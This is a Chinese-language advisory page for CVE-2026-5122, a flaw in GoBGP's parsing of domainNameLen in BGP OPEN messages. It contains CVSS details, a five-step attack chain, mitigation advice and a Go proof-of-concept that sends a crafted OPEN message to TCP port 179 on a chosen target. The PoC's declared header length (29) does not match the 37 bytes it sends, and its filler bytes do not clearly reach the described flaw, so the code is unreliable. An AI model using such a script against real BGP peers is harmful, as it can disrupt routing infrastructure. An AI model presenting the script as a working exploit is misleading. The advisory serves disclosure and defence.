CVE-2026-5122 osrg GoBGP 访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2026-5122

漏洞类型

访问控制不当

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

osrg GoBGP

漏洞概述

osrg GoBGP版本4.3.0及之前版本中发现一处安全缺陷。问题出在BGP OPEN消息处理器的DecodeFromBytes函数中，具体涉及对domainNameLen参数的处理不当。这种缺陷导致访问控制机制失效，远程攻击者可利用此问题进行攻击。尽管利用该漏洞需要高复杂度且难以被利用，但鉴于其潜在的完整性影响，建议管理员及时关注并应用安全补丁。

技术细节

该漏洞位于osrg GoBGP的BGP协议栈实现中，核心问题出在pkg/packet/bgp/bgp.go文件的DecodeFromBytes函数。当组件处理BGP OPEN消息时，该函数负责解析字节流数据。由于对传入参数domainNameLen缺乏严格的边界检查或逻辑验证，攻击者可以通过构造特制的BGP数据包，恶意操纵该参数的值。这种不当的参数处理会导致访问控制机制失效，可能引发逻辑判断错误或非预期的内存访问行为。尽管CVSS向量显示攻击复杂度为高（AC:H），且利用难度较大，但攻击者可以在无需认证（PR:N）和用户交互（UI:N）的情况下，通过网络（AV:N）远程发起攻击，从而对系统完整性（I:L）造成潜在影响。

攻击链分析

STEP 1

信息收集

识别网络上运行osrg GoBGP 4.3.0及以下版本的目标设备，确定其开放的BGP端口（通常为TCP 179）。

STEP 2

构造攻击载荷

攻击者编写脚本，构造特定的BGP OPEN消息包，其中包含被恶意操纵的domainNameLen参数，旨在绕过正常的参数校验。

STEP 3

发送恶意数据包

通过网络向目标设备的BGP端口发送上述构造的特制数据包，无需认证即可建立连接尝试。

STEP 4

触发漏洞

目标设备在调用DecodeFromBytes函数解析该消息时，由于未正确处理domainNameLen，导致访问控制逻辑失效。

STEP 5

产生影响

成功利用漏洞可能导致系统完整性受损，尽管利用难度较高，但仍可能干扰正常的BGP会话建立过程。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
	"fmt"
	"net"
)

// PoC for CVE-2026-5122: GoBGP DecodeFromBytes vulnerability
// This PoC demonstrates sending a crafted BGP OPEN message
// to trigger the improper access control in DecodeFromBytes.
func main() {
	target := "127.0.0.1:179" // Replace with target IP
	conn, err := net.Dial("tcp", target)
	if err != nil {
		fmt.Println("Connection failed:", err)
		return
	}
	defer conn.Close()

	// BGP Marker (16 bytes of 1s)
	marker := make([]byte, 16)
	for i := range marker {
		marker[i] = 0xFF
	}

	// BGP Header Length: 29 (Example)
	length := []byte{0x00, 0x1D}

	// BGP Message Type: 1 (OPEN)
	msgType := []byte{0x01}

	// BGP Version: 4
	version := []byte{0x04}

	// My AS: 100
	myAS := []byte{0x00, 0x64}

	// Hold Time: 180
	holdTime := []byte{0x00, 0xB4}

	// BGP Identifier
	bgpID := []byte{0x01, 0x02, 0x03, 0x04}

	// Optional Parameter Length
	// Manipulating this to potentially affect domainNameLen logic
	optParmLen := []byte{0x08}

	// Malformed Optional Parameters payload
	payload := append(marker, length...)
	payload = append(payload, msgType...)
	payload = append(payload, version...)
	payload = append(payload, myAS...)
	payload = append(payload, holdTime...)
	payload = append(payload, bgpID...)
	payload = append(payload, optParmLen...)
	// Append arbitrary data to simulate the malformed argument
	payload = append(payload, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x01, 0x02)

	_, err = conn.Write(payload)
	if err != nil {
		fmt.Println("Send failed:", err)
		return
	}
	fmt.Println("Malformed BGP OPEN message sent.")
}

影响范围

osrg GoBGP <= 4.3.0

防御指南

临时缓解措施

建议立即限制BGP端口（TCP 179）的网络访问，仅允许可信的对等体连接。同时，尽快应用官方提供的补丁（commit 2b09db390a3d455808363c53e409afe6b1b86d2d），升级GoBGP至修复版本。在无法立即升级的情况下，应密切监控日志中是否存在异常的BGP连接请求或解析错误。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5122
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5122
3 Details https://www.cvedetails.com/cve/CVE-2026-5122/
4 VulDB https://vuldb.com/cve/CVE-2026-5122
5 Link https://github.com/osrg/gobgp/
6 Link https://github.com/osrg/gobgp/commit/2b09db390a3d455808363c53e409afe6b1b86d2d
7 Link https://github.com/osrg/gobgp/pull/3343
8 Link https://vuldb.com/submit/780124
9 Link https://vuldb.com/vuln/354154
10 Link https://vuldb.com/vuln/354154/cti